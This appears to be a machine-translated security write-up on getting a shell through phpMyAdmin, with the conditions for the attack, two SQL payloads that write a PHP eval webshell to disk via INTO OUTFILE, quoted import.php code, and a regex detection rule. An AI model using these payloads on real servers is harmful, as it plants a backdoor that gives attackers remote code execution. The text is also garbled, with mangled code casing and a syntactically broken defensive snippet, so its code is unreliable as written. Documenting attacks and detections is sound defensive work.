Getshell Via phpmyadmin SQL execution to Write Evil Webshell File into Disk

Directory

1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking

1. Vulnerability description

PhpMyAdmin is a PHP-based, web-base-style MySQL database management tool that is architected on a Web site host, allowing administrators to manage the MySQL database using a Web interface. This web interface can be an easy way to enter complex SQL syntax, especially to handle the import and export of large amounts of data. One of the bigger advantages is that because phpMyAdmin is executed on the Web server like any other PHP program, you can use the HTML pages generated by these programs anywhere, that is, to manage the MySQL database remotely, to easily create, modify, and delete databases and data tables. It is also possible to build common PHP syntax by phpMyAdmin, which is convenient for writing web pages with the correct SQL syntax

2. Vulnerability Trigger Condition

1 . Known phpmyadmin root password, which is the root password for MySQL (phpMyAdmin is just a web-based tool to    Connect to MySQL) 1 MySQL itself default    weak password 2) through other vulnerabilities (such as injection) to obtain the root password of MySQL 2. The physical path    of a known web site 1) in the background of the phpMyAdmin " variable "tab page, you can see the physical path of MySQL, so as to infer the physical path    of the site  2) Obtain the physical path of the Web site through other web vulnerabilities

The core of Getshell through phpMyAdmin is the operation of file write through SQL, the common SQL is as follows

----1---Create TABLE A (cmd text not NULL), Insert into a (cmd) VALUES ('<?php @eval ($_post[cmd])?>');SelectCmd fromA into outfile'c:/htdocs/1.php'; Drop table if EXISTS a;drop table if EXISTS ' a ';----1-------2---Select '<?php @eval ($_post[pass]);? >'Into OUTFILE'd:/wamp/www/exehack.php'----2---

Relevant Link:

http://www.exehack.net/681.htmlhttp://www.exehack.net/99.htmlhttp://  www.187299.com/archives/1695

3. Vulnerability Impact Range

All phpMyAdmin versions

4. Vulnerability Code Analysis

/phpmyadmin/import.php

All logic that handles user-defined SQL parsing execution is implemented in this PHP file

/*This code point is Important$import_text is the one, need to be check Strictly*/if($go _sql) {//Parse SQL queryInclude_once'libraries/parse_analyze.inc.php'; if(Isset ($ajax _reload) && $ajax _reload['Reload'] ===true) {$response=pma_response::getinstance (); $response->addjson ('Ajax_reload', $ajax _reload); } pma_executequeryandsendqueryresponse ($analyzed _sql_results,false, $db, $table,NULL, $import _text,NULL, $analyzed _sql_results['is_affected'],NULL,        NULL,NULL,NULL, $Goto, $pmaThemeImage,NULL,NULL,NULL, $sql _query,NULL,NULL    );} Else if($result) {//Save a bookmark with more than one queries (if Bookmark label given).    if(! empty ($_post['Bkm_label']) &&!empty ($import _text)) {Pma_storethequeryasbookmark ($db, $GLOBALS ['CFG']['Bookmark']['User'], $import _text, $_post['Bkm_label'], isset ($_post['Bkm_replace']) ? $_post['Bkm_replace'] :NULL        ); } $response=pma_response::getinstance (); $response->issuccess (true); $response->addjson ('message', Pma_message::success ($msg)); $response-Addjson ('Sql_query', Pma_util::getmessage ($msg, $sql _query,'Success')    );} Else if($result = =false) {$response=pma_response::getinstance (); $response->issuccess (false); $response->addjson ('message', Pma_message::error ($msg));} Else{$active _page= $Goto; Include"'. $Goto;}

5. Defense Methods

Malicious checking of variable $import_text is our defense of Getshell attack against phpMyAdmin executing SQL export File

if (Preg_match ("/select.*into.*outfile/i", $import _text, $matches)) {      "request error! " " </br> " . $matches [0];    Die ();}

6. Defensive Thinking

Copyright (c) Littlehann All rights reserved

Getshell Via phpmyadmin SQL execution to Write Evil Webshell File into Disk